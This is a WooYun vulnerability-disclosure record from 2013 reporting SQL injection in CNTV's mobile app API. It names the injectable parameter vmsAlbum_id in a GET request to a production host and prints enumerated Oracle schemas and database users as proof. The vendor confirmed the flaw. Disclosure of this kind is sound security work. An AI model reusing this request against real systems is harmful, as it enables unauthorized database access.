{"id": 6338, "wybug_id": "wooyun-2013-046137", "wybug_title": "APP终结者10#中国网络电视台CNTV多款主要无线产品Sql注入多库", "wybug_corp": "中国网络电视台", "wybug_author": "zzR", "wybug_date": "2013-12-16 17:36", "wybug_open_date": "2014-01-30 17:37", "wybug_type": "SQL注射漏洞", "wybug_level": "高", "wybug_rank_0": "10", "wybug_status": "厂商已经确认", "wybug_from": "http://www.wooyun.org", "wybug_tags": ["注入", "移动安全", "云端"], "wybug_detail": "漏洞详情 披露状态：   \t\t\t\t\t\t\t\t\t2013-12-16：\t细节已通知厂商并且等待厂商处理中\t\t\t\t\t\t\t\t\t2013-12-16：\t厂商已经确认，细节仅向厂商公开\t\t\t\t\t\t\t\t\t2013-12-26：\t细节向核心白帽子及相关领域专家公开\t\t\t\t\t\t\t\t\t2014-01-05：\t细节向普通白帽子公开\t\t\t\t\t\t\t\t\t2014-01-15：\t细节向实习白帽子公开\t\t\t\t\t\t\t\t\t2014-01-30：\t细节向公众公开  简要描述： 每天晚上准时收看新闻联播，接受教育，积极进步。在19:29:45的时候，主持人会说：获取更多资讯，敬请关注央视微博、微信、新闻客户端……其实这个漏洞系列title不重要，重要是在这些产品中产生的各种各样类型的问题。这是从一个比较边缘的产品出发，最后还是会涉及到核心产品。 详细说明：  从央视的几款主要产品出发，主要涉及央视新闻 、CNTV、CNTV Cbox直播大全、5+VIP等都会有相同的app请求。从一个不起眼的app出发IPandaCam，注入到核心产品数据\nGET /iphoneInterface/cntv/getVideoListBySort.json?vmsAlbum_id=VSET100167308821&page=1&pageSize=20 HTTP/1.1Host: hot.app.cntv.cnProxy-Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*Accept-Language: zh-cnConnection: keep-alivePragma: no-cacheUser-Agent: LovePanda/1.0.1 CFNetwork/672.0.8 Darwin/14.0.0\n vmsAlbum_id存在注入   漏洞证明：  current db&user\n\ndbs\n[*] APEX_030200[*] CMSUSER[*] CTXSYS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] SYS[*] SYSTEM[*] VMSUSER[*] XDB\n其中cmuser 174张表\n\nusers\ndatabase management system users [36]:[*] ANONYMOUS[*] APEX_030200[*] APEX_PUBLIC_USER[*] APPQOSSYS[*] CMSSEL[*] CMSUSER[*] CNTVSEARCH[*] CTXSYS[*] DBSNMP[*] DIP[*] EXFSYS[*] FLOWS_FILES[*] GOLDENGATE[*] MDDATA[*] MDSYS[*] MGMT_VIEW[*] OLAPSYS[*] ORACLE_OCM[*] ORDDATA[*] ORDPLUGINS[*] ORDSYS[*] OUTLN[*] OWBSYS[*] OWBSYS_AUDIT[*] SI_INFORMTN_SCHEMA[*] SPATIAL_CSW_ADMIN_USR[*] SPATIAL_WFS_ADMIN_USR[*] SYS[*] SYSMAN[*] SYSTEM[*] VMSSEL[*] VMSUSER[*] WMSYS[*] XDB[*] XS$NULL[*] YXG\n未继续深入   修复方案：  来乌云把爱带回家   版权声明：转载请注明来源 zzR@乌云\n ", "wybug_reply": "漏洞回应  厂商回应： 危害等级：高 漏洞Rank：15  确认时间：2013-12-16 17:46 厂商回复： 非常感谢，我们将及时修复漏洞! 最新状态： 暂无  ", "replys": "漏洞评价：\n评论\n     2013-12-16 18:21 |    \t\t大胖子 \t\t\t( 普通白帽子  |\t\t\t        Rank:122 漏洞数:12        )\t\t \n  悄悄关注之    \n     2013-12-16 18:30 |    \t\tzzR  \t\t\t( 核心白帽子 |\t\t\t        Rank:1382 漏洞数:122        | 收wb   1：5 无限量收   [平台担保])\t\t \n  @大胖子 @小胖子 亲皂友？    \n     2013-12-16 18:48 |    \t\t小胖子  \t\t\t( 核心白帽子 |\t\t\t        Rank:1727 漏洞数:140        | 如果大海能够带走我的矮丑...)\t\t \n  @大胖子 尼玛打击伪劣产品人人有责！！！    \n     2013-12-16 18:49 |    \t\t寂寞的瘦子 \t\t\t( 普通白帽子  |\t\t\t        Rank:242 漏洞数:53        | 一切语言转汇编理论)\t\t \n  @小胖子 @zzR @大胖子 搞笑    \n  \n\n\n", "wybug_level_fromcorp": "高", "wybug_rank_fromcorp": 15, "Ranks": null}